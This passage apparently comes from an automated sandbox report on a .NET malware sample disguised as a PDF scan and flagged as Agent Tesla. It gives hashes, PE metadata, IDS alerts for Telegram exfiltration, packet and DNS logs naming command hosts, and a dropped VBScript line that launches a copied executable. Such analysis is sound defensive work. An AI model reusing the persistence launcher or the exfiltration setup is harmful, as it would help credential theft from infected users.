                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        Qaovmgmn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        webhook.ps1Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        S_code_runner.ps1Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        No context
                                                                        Process:C:\Users\user\Desktop\rScan_0984829339_PDF.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):220160
                                                                        Entropy (8bit):5.893946470162557
                                                                        Encrypted:false
                                                                        SSDEEP:3072:vt18yO+SfeIWIWUE5fGEgHmUfjPGBTOqAnulg7eQ5RxDkktr/8G1doRb8JJUAJU2:V1z9IWbnhP8QQk41E
                                                                        MD5:A89DCE2412407F0BD1F4B9E575545AEB
                                                                        SHA1:9AD65F7F6252C2DF5C97B44000D12C988EC7D4A1
                                                                        SHA-256:C8C4A0F5BC0278F9392A4356AC121458F0F4D10420F65B468E7556B08C84FF5E
                                                                        SHA-512:74577FB4DB7127DD8137DCCAAB8D05A5F4254ACD19D5C6219A60174010E5D4DAD5A688B9EE61727972F503EB33E59EC10B3D84871CED3CA4AE10E59669140F61
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                                        Reputation:low
                                                                        Process:C:\Users\user\Desktop\rScan_0984829339_PDF.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                        Process:C:\Users\user\Desktop\rScan_0984829339_PDF.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):82
                                                                        Entropy (8bit):4.719275218915188
                                                                        Encrypted:false
                                                                        SSDEEP:3:FER/n0eFHHoN+EaKC5gBJHnn:FER/lFHIN7aZ5EJ
                                                                        MD5:C5824D02D09226898DCB943FCCDEE621
                                                                        SHA1:A47C03D2221A6DFACC9F74C4EF5AB4582643379A
                                                                        SHA-256:42460A84A47A22F30EC9CD954315A76BF6203258A50F08DC2104D24ACB86322F
                                                                        SHA-512:7CCC73953879DD817B3929F33F15D9A92A407A69D8CC56B8766A612E5405B49BD74561B3473423C2D687F89BED3EFCB8FFD4972C2EEBE7D0594D2AE9BF48A6B9
                                                                        Malicious:true
                                                                        Reputation:low
                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Guid.exe"""
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.893946470162557
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:rScan_0984829339_PDF.exe
                                                                        File size:220'160 bytes
                                                                        MD5:a89dce2412407f0bd1f4b9e575545aeb
                                                                        SHA1:9ad65f7f6252c2df5c97b44000d12c988ec7d4a1
                                                                        SHA256:c8c4a0f5bc0278f9392a4356ac121458f0f4d10420f65b468e7556b08c84ff5e
                                                                        SHA512:74577fb4db7127dd8137dccaab8d05a5f4254acd19d5c6219a60174010e5d4dad5a688b9ee61727972f503eb33e59ec10b3d84871ced3ca4ae10e59669140f61
                                                                        SSDEEP:3072:vt18yO+SfeIWIWUE5fGEgHmUfjPGBTOqAnulg7eQ5RxDkktr/8G1doRb8JJUAJU2:V1z9IWbnhP8QQk41E
                                                                        TLSH:E7244A20B79CE567F26AABBAD4E39D86D3F08064E71EE7CE5C0064F925023A0F815357
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x43710e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x670DE22B [Tue Oct 15 03:31:55 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x370bc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x5b6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x35114 | 0x35200 | a41d5dc52892322cdc076efbfdd930fb | False | 0.38848345588235295 | SysEx File - | 5.912693337658005 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x38000 | 0x5b6 | 0x600 | da43981acdfdf160209b5a2a73e34185 | False | 0.4192708333333333 | data | 4.108095307424458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x3a000 | 0xc | 0x200 | 7121bce33037e0ee1c67947a25185429 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x380a0 | 0x32c | data | | | 0.4236453201970443 |
| RT_MANIFEST | 0x383cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-15T21:32:13.214696+0200 | 2851779 | ETPRO MALWARE Agent Tesla Telegram Exfil | 1 | 192.168.2.6 | 49739 | 149.154.167.220 | 443 | TCP |
| 2024-10-15T21:32:13.214696+0200 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.6 | 49739 | 149.154.167.220 | 443 | TCP |
| 2024-10-15T21:32:13.216256+0200 | 2854281 | ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound | 1 | 149.154.167.220 | 443 | 192.168.2.6 | 49739 | TCP |
| 2024-10-15T21:32:32.320933+0200 | 2851779 | ETPRO MALWARE Agent Tesla Telegram Exfil | 1 | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | TCP |
| 2024-10-15T21:32:32.320933+0200 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | TCP |
| 2024-10-15T21:32:32.322256+0200 | 2854281 | ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound | 1 | 149.154.167.220 | 443 | 192.168.2.6 | 49831 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Oct 15, 2024 21:32:08.324357986 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.324374914 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.324428082 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.352636099 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.352735043 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.392366886 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.392441988 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.446209908 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.446306944 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.446881056 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.446948051 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.474428892 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.474507093 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.520620108 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.520709038 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.569555044 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.569664955 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.569698095 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.569756985 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.600019932 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.600152016 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.647155046 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.647262096 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.697949886 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.698034048 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.698252916 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.698316097 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.725384951 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.725580931 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.772202015 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.772313118 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.814691067 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.814788103 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.823892117 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.823980093 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.824671984 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.824738026 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.852587938 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.852695942 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.940906048 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.941025019 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.950325012 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.950407028 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.975528002 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.975647926 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:08.977955103 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:08.978041887 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.065118074 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.065206051 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.065960884 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.066032887 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.073945999 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.074024916 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.100136995 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.100219965 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.143527985 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.143625021 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.223870039 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.223946095 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.224338055 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.224395990 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.233323097 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.233395100 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.233786106 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.233871937 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.268779993 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.268848896 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.268867970 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.268887997 CEST44349711103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:09.268907070 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.268924952 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:09.364468098 CEST49711443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:11.641328096 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:11.641392946 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:11.641477108 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:11.645632982 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:11.645668030 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:12.525702000 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:12.525968075 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:12.537117004 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:12.537163019 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:12.537421942 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:12.584850073 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:12.612759113 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:12.655430079 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:12.882664919 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:12.882968903 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:12.883003950 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:13.214720011 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:13.216002941 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:13.216063976 CEST44349739149.154.167.220192.168.2.6
                                                                        Oct 15, 2024 21:32:13.216119051 CEST49739443192.168.2.6149.154.167.220
                                                                        Oct 15, 2024 21:32:25.295785904 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:25.295872927 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:25.296041965 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:25.302239895 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:25.302278042 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.412185907 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.412388086 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:26.415215969 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:26.415258884 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.415549040 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.459868908 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:26.467694998 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:26.515409946 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.833960056 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.833973885 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.833990097 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.834187031 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:26.834254026 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:26.881830931 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.015743017 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.015753984 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.015979052 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.072252989 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.072263002 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.072465897 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.073050022 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.073059082 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.073139906 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.074565887 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.074572086 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.074651957 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.252036095 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.252046108 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.252185106 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.310053110 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.310059071 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.310199022 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.310869932 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.310956001 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.311469078 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.311544895 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.312274933 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.312356949 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.313060999 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.313133001 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.313987017 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.314078093 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.489538908 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.489795923 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.489893913 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.490082026 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.490463972 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.490530014 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.547785997 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.547878981 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.548213959 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.548281908 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.549010992 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.549072981 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.549721003 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.549777985 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.550163031 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.550220013 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.550255060 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.550308943 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.550548077 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.550627947 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.607609987 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.607923031 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.608232021 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.608455896 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.608798981 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.608975887 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.665728092 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.665834904 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.696011066 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.696089029 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.728007078 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.728082895 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.728235006 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.728291988 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.728725910 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.728785992 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.728880882 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.728948116 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.729227066 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.729353905 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.729485035 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.729545116 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.788355112 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.788438082 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.788666010 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.788748026 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.788952112 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.789011002 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.789326906 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.789396048 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.789565086 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.789624929 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.847995996 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.848088980 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.848261118 CEST44349804103.191.208.122192.168.2.6
                                                                        Oct 15, 2024 21:32:27.848335028 CEST49804443192.168.2.6103.191.208.122
                                                                        Oct 15, 2024 21:32:27.848560095 CEST44349804103.191.208.122192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 21:32:01.198885918 CEST | 57074 | 53 | 192.168.2.6 | 1.1.1.1
Oct 15, 2024 21:32:01.938585043 CEST | 53 | 57074 | 1.1.1.1 | 192.168.2.6
Oct 15, 2024 21:32:11.506774902 CEST | 64601 | 53 | 192.168.2.6 | 1.1.1.1
Oct 15, 2024 21:32:11.635629892 CEST | 53 | 64601 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 21:32:01.198885918 CEST | 192.168.2.6 | 1.1.1.1 | 0x80d8 | Standard query (0) | rubberpartsmanufacturers.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 21:32:11.506774902 CEST | 192.168.2.6 | 1.1.1.1 | 0x3270 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 21:32:01.938585043 CEST | 1.1.1.1 | 192.168.2.6 | 0x80d8 | No error (0) | rubberpartsmanufacturers.com | | 103.191.208.122 | A (IP address) | IN (0x0001) | false
